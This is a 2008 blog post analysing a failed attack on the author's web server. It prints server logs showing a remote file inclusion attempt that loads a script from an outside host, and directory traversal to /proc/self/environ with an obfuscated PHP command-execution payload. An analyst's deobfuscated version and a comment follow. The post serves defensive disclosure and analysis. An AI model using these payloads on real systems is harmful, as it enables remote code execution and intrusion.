Blog for hpHosts, and whatever else I feel like writing about ....

Wednesday 10 September 2008

Alas, another exploit attempt (RFI+PHP)

Alas, it seems 88.84.157.127 (v32747.1blu.de) badly wanted to exploit my server. From the wonderful world of logs, we have (note that the scroll bars won't display in IE for some reason);


2008-09-10 06:40:53 GET /misc/cyberdefender/server_request.php CONFIG[gameroot]=http://bregler-gmbh.de/.sys/i??? 80 - 88.84.157.127 http://cr4nk.ws/+[de]+(Windows+3.1;+I)+[crank] - mysteryfcm.co.uk 404 0 2
2008-09-10 06:40:53 GET /misc/cyberdefender/errors.php error=http://bregler-gmbh.de/.sys/i??? 80 - 88.84.157.127 http://cr4nk.ws/+[de]+(Windows+3.1;+I)+[crank] - mysteryfcm.co.uk 404 0 2
2008-09-10 06:40:53 GET /misc/cyberdefender/server_request.php CONFIG[gameroot]=/../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ 80 - 88.84.157.127 <?+$x0e="\145x\x65\x63";+$x0f="\x66eo\146";+$x10="\x66\x72ea\x64";+$x11="\146un\x63\164io\x6e\x5f\x65x\151s\x74\x73";+$x12="i\163\x5f\162\x65s\157ur\x63\x65";+$x13="\152\157\x69\156";+$x14="o\142_g\145t\x5f\x63o\156\164en\x74\x73";+$x15="ob\137\x65\156d\137\x63lea\156";+$x16="\x6fb_st\x61\x72\164";+$x17="\x70\141\163s\164\x68\162\165";+$x18="\x70\143\154ose";+$x19="p\157\160e\x6e";+$x1a="\163h\145\154l\137\x65\170e\143";+$x1b="\x73\x79s\x74e\x6d";+function+x0b($x0b){+global+$x0e,$x0f,$x10,$x11,$x12,$x13,$x14,$x15,$x16,$x17,$x18,$x19,$x1a,$x1b;++$x0c+=+'';+if+(!empty($x0b))+{if($x11('exec'))+{@$x0e($x0b,$x0c);$x0c+=+$x13("\n",$x0c);+}elseif($x11('shell_exec'))+{$x0c+=+@$x1a($x0b);+}elseif($x11('system'))+{@$x16();@$x1b($x0b);$x0c+=+@$x14();@$x15();+}elseif($x11('passthru'))+{@$x16();@$x17($x0b);$x0c+=+@$x14();@$x15();+}elseif(@$x12($x0d+=+@$x19($x0b,"\x72"))){+$x0c+=+"";+while(!@$x0f($x0d))+{+$x0c+.=+@$x10($x0d,1024);+}+@$x18($x0d);}+}+return+$x0c;}echo+x0b("ec\150\157\x20c\1624n\153\137\x72oc\153s");?> - mysteryfcm.co.uk 200 0 0
2008-09-10 06:40:53 GET /misc/cyberdefender/server_request.php CONFIG[gameroot]=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ 80 - 88.84.157.127 <?+$x0e="\145x\x65\x63";+$x0f="\x66eo\146";+$x10="\x66\x72ea\x64";+$x11="\146un\x63\164io\x6e\x5f\x65x\151s\x74\x73";+$x12="i\163\x5f\162\x65s\157ur\x63\x65";+$x13="\152\157\x69\156";+$x14="o\142_g\145t\x5f\x63o\156\164en\x74\x73";+$x15="ob\137\x65\156d\137\x63lea\156";+$x16="\x6fb_st\x61\x72\164";+$x17="\x70\141\163s\164\x68\162\165";+$x18="\x70\143\154ose";+$x19="p\157\160e\x6e";+$x1a="\163h\145\154l\137\x65\170e\143";+$x1b="\x73\x79s\x74e\x6d";+function+x0b($x0b){+global+$x0e,$x0f,$x10,$x11,$x12,$x13,$x14,$x15,$x16,$x17,$x18,$x19,$x1a,$x1b;++$x0c+=+'';+if+(!empty($x0b))+{if($x11('exec'))+{@$x0e($x0b,$x0c);$x0c+=+$x13("\n",$x0c);+}elseif($x11('shell_exec'))+{$x0c+=+@$x1a($x0b);+}elseif($x11('system'))+{@$x16();@$x1b($x0b);$x0c+=+@$x14();@$x15();+}elseif($x11('passthru'))+{@$x16();@$x17($x0b);$x0c+=+@$x14();@$x15();+}elseif(@$x12($x0d+=+@$x19($x0b,"\x72"))){+$x0c+=+"";+while(!@$x0f($x0d))+{+$x0c+.=+@$x10($x0d,1024);+}+@$x18($x0d);}+}+return+$x0c;}echo+x0b("ec\150\157\x20c\1624n\153\137\x72oc\153s");?> - mysteryfcm.co.uk 200 0 0
2008-09-10 06:40:53 GET /server_request.php CONFIG[gameroot]=http://bregler-gmbh.de/.sys/i??? 80 - 88.84.157.127 http://cr4nk.ws/+[de]+(Windows+3.1;+I)+[crank] - mysteryfcm.co.uk 404 0 2
2008-09-10 06:40:53 GET /errors.php error=http://bregler-gmbh.de/.sys/i??? 80 - 88.84.157.127 http://cr4nk.ws/+[de]+(Windows+3.1;+I)+[crank] - mysteryfcm.co.uk 404 0 2
2008-09-10 06:40:53 GET /server_request.php CONFIG[gameroot]=/../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ 80 - 88.84.157.127 <?+$x0e="\145x\x65\x63";+$x0f="\x66eo\146";+$x10="\x66\x72ea\x64";+$x11="\146un\x63\164io\x6e\x5f\x65x\151s\x74\x73";+$x12="i\163\x5f\162\x65s\157ur\x63\x65";+$x13="\152\157\x69\156";+$x14="o\142_g\145t\x5f\x63o\156\164en\x74\x73";+$x15="ob\137\x65\156d\137\x63lea\156";+$x16="\x6fb_st\x61\x72\164";+$x17="\x70\141\163s\164\x68\162\165";+$x18="\x70\143\154ose";+$x19="p\157\160e\x6e";+$x1a="\163h\145\154l\137\x65\170e\143";+$x1b="\x73\x79s\x74e\x6d";+function+x0b($x0b){+global+$x0e,$x0f,$x10,$x11,$x12,$x13,$x14,$x15,$x16,$x17,$x18,$x19,$x1a,$x1b;++$x0c+=+'';+if+(!empty($x0b))+{if($x11('exec'))+{@$x0e($x0b,$x0c);$x0c+=+$x13("\n",$x0c);+}elseif($x11('shell_exec'))+{$x0c+=+@$x1a($x0b);+}elseif($x11('system'))+{@$x16();@$x1b($x0b);$x0c+=+@$x14();@$x15();+}elseif($x11('passthru'))+{@$x16();@$x17($x0b);$x0c+=+@$x14();@$x15();+}elseif(@$x12($x0d+=+@$x19($x0b,"\x72"))){+$x0c+=+"";+while(!@$x0f($x0d))+{+$x0c+.=+@$x10($x0d,1024);+}+@$x18($x0d);}+}+return+$x0c;}echo+x0b("ec\150\157\x20c\1624n\153\137\x72oc\153s");?> - mysteryfcm.co.uk 200 0 0
2008-09-10 06:40:54 GET /server_request.php CONFIG[gameroot]=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ 80 - 88.84.157.127 <?+$x0e="\145x\x65\x63";+$x0f="\x66eo\146";+$x10="\x66\x72ea\x64";+$x11="\146un\x63\164io\x6e\x5f\x65x\151s\x74\x73";+$x12="i\163\x5f\162\x65s\157ur\x63\x65";+$x13="\152\157\x69\156";+$x14="o\142_g\145t\x5f\x63o\156\164en\x74\x73";+$x15="ob\137\x65\156d\137\x63lea\156";+$x16="\x6fb_st\x61\x72\164";+$x17="\x70\141\163s\164\x68\162\165";+$x18="\x70\143\154ose";+$x19="p\157\160e\x6e";+$x1a="\163h\145\154l\137\x65\170e\143";+$x1b="\x73\x79s\x74e\x6d";+function+x0b($x0b){+global+$x0e,$x0f,$x10,$x11,$x12,$x13,$x14,$x15,$x16,$x17,$x18,$x19,$x1a,$x1b;++$x0c+=+'';+if+(!empty($x0b))+{if($x11('exec'))+{@$x0e($x0b,$x0c);$x0c+=+$x13("\n",$x0c);+}elseif($x11('shell_exec'))+{$x0c+=+@$x1a($x0b);+}elseif($x11('system'))+{@$x16();@$x1b($x0b);$x0c+=+@$x14();@$x15();+}elseif($x11('passthru'))+{@$x16();@$x17($x0b);$x0c+=+@$x14();@$x15();+}elseif(@$x12($x0d+=+@$x19($x0b,"\x72"))){+$x0c+=+"";+while(!@$x0f($x0d))+{+$x0c+.=+@$x10($x0d,1024);+}+@$x18($x0d);}+}+return+$x0c;}echo+x0b("ec\150\157\x20c\1624n\153\137\x72oc\153s");?> - mysteryfcm.co.uk 200 0 0
2008-09-10 06:40:54 GET /misc/server_request.php CONFIG[gameroot]=http://bregler-gmbh.de/.sys/i??? 80 - 88.84.157.127 http://cr4nk.ws/+[de]+(Windows+3.1;+I)+[crank] - mysteryfcm.co.uk 404 0 2
2008-09-10 06:40:54 GET /misc/errors.php error=http://bregler-gmbh.de/.sys/i??? 80 - 88.84.157.127 http://cr4nk.ws/+[de]+(Windows+3.1;+I)+[crank] - mysteryfcm.co.uk 404 0 2
2008-09-10 06:40:54 GET /misc/server_request.php CONFIG[gameroot]=/../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ 80 - 88.84.157.127 <?+$x0e="\145x\x65\x63";+$x0f="\x66eo\146";+$x10="\x66\x72ea\x64";+$x11="\146un\x63\164io\x6e\x5f\x65x\151s\x74\x73";+$x12="i\163\x5f\162\x65s\157ur\x63\x65";+$x13="\152\157\x69\156";+$x14="o\142_g\145t\x5f\x63o\156\164en\x74\x73";+$x15="ob\137\x65\156d\137\x63lea\156";+$x16="\x6fb_st\x61\x72\164";+$x17="\x70\141\163s\164\x68\162\165";+$x18="\x70\143\154ose";+$x19="p\157\160e\x6e";+$x1a="\163h\145\154l\137\x65\170e\143";+$x1b="\x73\x79s\x74e\x6d";+function+x0b($x0b){+global+$x0e,$x0f,$x10,$x11,$x12,$x13,$x14,$x15,$x16,$x17,$x18,$x19,$x1a,$x1b;++$x0c+=+'';+if+(!empty($x0b))+{if($x11('exec'))+{@$x0e($x0b,$x0c);$x0c+=+$x13("\n",$x0c);+}elseif($x11('shell_exec'))+{$x0c+=+@$x1a($x0b);+}elseif($x11('system'))+{@$x16();@$x1b($x0b);$x0c+=+@$x14();@$x15();+}elseif($x11('passthru'))+{@$x16();@$x17($x0b);$x0c+=+@$x14();@$x15();+}elseif(@$x12($x0d+=+@$x19($x0b,"\x72"))){+$x0c+=+"";+while(!@$x0f($x0d))+{+$x0c+.=+@$x10($x0d,1024);+}+@$x18($x0d);}+}+return+$x0c;}echo+x0b("ec\150\157\x20c\1624n\153\137\x72oc\153s");?> - mysteryfcm.co.uk 200 0 0
2008-09-10 06:40:54 GET /misc/server_request.php CONFIG[gameroot]=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ 80 - 88.84.157.127 <?+$x0e="\145x\x65\x63";+$x0f="\x66eo\146";+$x10="\x66\x72ea\x64";+$x11="\146un\x63\164io\x6e\x5f\x65x\151s\x74\x73";+$x12="i\163\x5f\162\x65s\157ur\x63\x65";+$x13="\152\157\x69\156";+$x14="o\142_g\145t\x5f\x63o\156\164en\x74\x73";+$x15="ob\137\x65\156d\137\x63lea\156";+$x16="\x6fb_st\x61\x72\164";+$x17="\x70\141\163s\164\x68\162\165";+$x18="\x70\143\154ose";+$x19="p\157\160e\x6e";+$x1a="\163h\145\154l\137\x65\170e\143";+$x1b="\x73\x79s\x74e\x6d";+function+x0b($x0b){+global+$x0e,$x0f,$x10,$x11,$x12,$x13,$x14,$x15,$x16,$x17,$x18,$x19,$x1a,$x1b;++$x0c+=+'';+if+(!empty($x0b))+{if($x11('exec'))+{@$x0e($x0b,$x0c);$x0c+=+$x13("\n",$x0c);+}elseif($x11('shell_exec'))+{$x0c+=+@$x1a($x0b);+}elseif($x11('system'))+{@$x16();@$x1b($x0b);$x0c+=+@$x14();@$x15();+}elseif($x11('passthru'))+{@$x16();@$x17($x0b);$x0c+=+@$x14();@$x15();+}elseif(@$x12($x0d+=+@$x19($x0b,"\x72"))){+$x0c+=+"";+while(!@$x0f($x0d))+{+$x0c+.=+@$x10($x0d,1024);+}+@$x18($x0d);}+}+return+$x0c;}echo+x0b("ec\150\157\x20c\1624n\153\137\x72oc\153s");?> - mysteryfcm.co.uk 200 0 0


The RFI (Remote File Inclusion), comes courtesy of;

http://bregler-gmbh.de/.sys/i???


*****************************************************************
vURL Desktop Edition v0.3.4 Results
Source code for: http://bregler-gmbh.de/.sys/i???
Server IP: 212.227.240.102 [ regiocd.de ]
hpHosts Status: Not Listed
MDL Status: Not Listed
PhishTank Status: Not Listed
Scripts: 0
iFrames: 0
Date: 10 September 2008
Time: 08:49:35:49
*****************************************************************

#####################################################################
# +------------------+ #
# | ___ | Crank #
# | _ (,~ | _ | we are crank. this is crank. #
# | (____/ |____) | #
# | ||||| ||||| | if your skilld in perl,php,c,c++ #
# | ||||| ||||| | Contact: http://cr4nk.ws #
# | |||||\ /||||| | E-Mail : cr4nk@land.ru #
# | |||'//\/\\`||| | irc.unixunited.net /join #cr4nk #
# | |' m' /\ `m `| | #
# | /||\ | Greets to our Friends #
# \_ _/ tng,asc,satyr #
# `------------' #
#####################################################################


$x0b="in\x69_\147\x65\x74"; $x0c="\163tr\x74o\154\x6fwe\x72";
echo "c\162\141\156k\x5fr\157c\x6bs";if (@$x0b("\163\x61\x66e_\x6d\157\144e") or $x0c(@$x0b("\x73a\x66\x65_m\x6fde")) == "\x6f\x6e"){echo "\123a\146\x65\155od\145\x3ao\156";}else {echo "\123a\146e\x6do\x64e:\x6ff\x66";}exit(); ?>


Most likely a hacked server, but they've been notified.

The code that they've tried directly injecting is as follows;


<?
    $x0e="\145x\x65\x63";
    $x0f="\x66eo\146";
    $x10="\x66\x72ea\x64";
    $x11="\146un\x63\164io\x6e\x5f\x65x\151s\x74\x73";
    $x12="i\163\x5f\162\x65s\157ur\x63\x65";
    $x13="\152\157\x69\156";
    $x14="o\142_g\145t\x5f\x63o\156\164en\x74\x73";
    $x15="ob\137\x65\156d\137\x63lea\156";
    $x16="\x6fb_st\x61\x72\164";
    $x17="\x70\141\163s\164\x68\162\165";
    $x18="\x70\143\154ose";
    $x19="p\157\160e\x6e";
    $x1a="\163h\145\154l\137\x65\170e\143";
    $x1b="\x73\x79s\x74e\x6d";
    function x0b($x0b){
        global$x0e,$x0f,$x10,$x11,$x12,$x13,$x14,$x15,$x16,$x17,$x18,$x19,$x1a,$x1b;$x0c='';
        if(!empty($x0b)){if($x11('exec')){@$x0e($x0b,$x0c);$x0c=$x13("\n",$x0c);
    }
        elseif($x11('shell_exec')){$x0c=@$x1a($x0b);
    }
        elseif($x11('system')){@$x16();@$x1b($x0b);$x0c=@$x14();@$x15();
    }
        elseif($x11('passthru')){@$x16();@$x17($x0b);$x0c=@$x14();@$x15();
    }
        elseif(@$x12($x0d=@$x19($x0b,"\x72"))){$x0c="";
            while(!@$x0f($x0d)){$x0c.=@$x10($x0d,1024);
    }
            @$x18($x0d);
    }
    }
            return$x0c;
    }
        echo x0b("ec\150\157\x20c\1624n\153\137\x72oc\153s");
?>


/edit

I sent this to the ladies and gents at the ISC (Internet Storm Center), and got a reply from Bojan Zdrnj (cheers Bojan :o));


Thanks for sending this. They basically obfuscate characters by using their hex or octal values. When you see numbers like this \111 it's their octal value and when you see numbers like \x1f it's the hex value.

You can clean this up by using perl easily. I just saved the original PHP (the one you sent) into sample.php and used the following line (two perl calls inside, this could be done in a single perl program as well):

$ perl -pe 's/\\(\d\d\d)/chr(oct($1))/ge' < sample.php | perl -pe 's/\\x(\d\d)/chr(hex($1))/ge'


Once you execute this you'll get readable code:

<?
    $x0e="exec";
    $x0f="feof";
    $x10="fread";
    $x11="function_exists";
    $x12="is_resource";
    $x13="join";
    $x14="ob_get_contents";
    $x15="ob_end_clean";
    $x16="ob_start";
    $x17="passthru";
    $x18="pclose";
    $x19="popen";
    $x1a="shell_exec";
    $x1b="system";
    function x0b($x0b){
    global$x0e,$x0f,$x10,$x11,$x12,$x13,$x14,$x15,$x16,$x17,$x18,$x19,$x1a,$x1b;$x0c='';
    if(!empty($x0b)){if($x11('exec')){@$x0e($x0b,$x0c);$x0c=$x13("\n",$x0c);
    }
        elseif($x11('shell_exec')){$x0c=@$x1a($x0b);
    }
        elseif($x11('system')){@$x16();@$x1b($x0b);$x0c=@$x14();@$x15();
    }
    elseif($x11('passthru')){@$x16();@$x17($x0b);$x0c=@$x14();@$x15();
    }
        elseif(@$x12($x0d=@$x19($x0b,"r"))){$x0c="";
            while(!@$x0f($x0d)){$x0c.=@$x10($x0d,1024);
    }
            @$x18($x0d);
    }
    }
            return$x0c;
    }
        echo x0b("echo cr4nk_rocks");
?>


This results in them trying to execute the command "echo cr4nk rocks" by using the PHP functions exec, shell_exec, system and passthru. At the end they probably check the result so if they get the string "cr4nk rocks" back, they know that the RFI attack worked.

Cheers,

Bojan
ISC Handler

1 comment:

Tim said...

Thanks for the post. Our webservers were recently scanned with the same attempted exploit.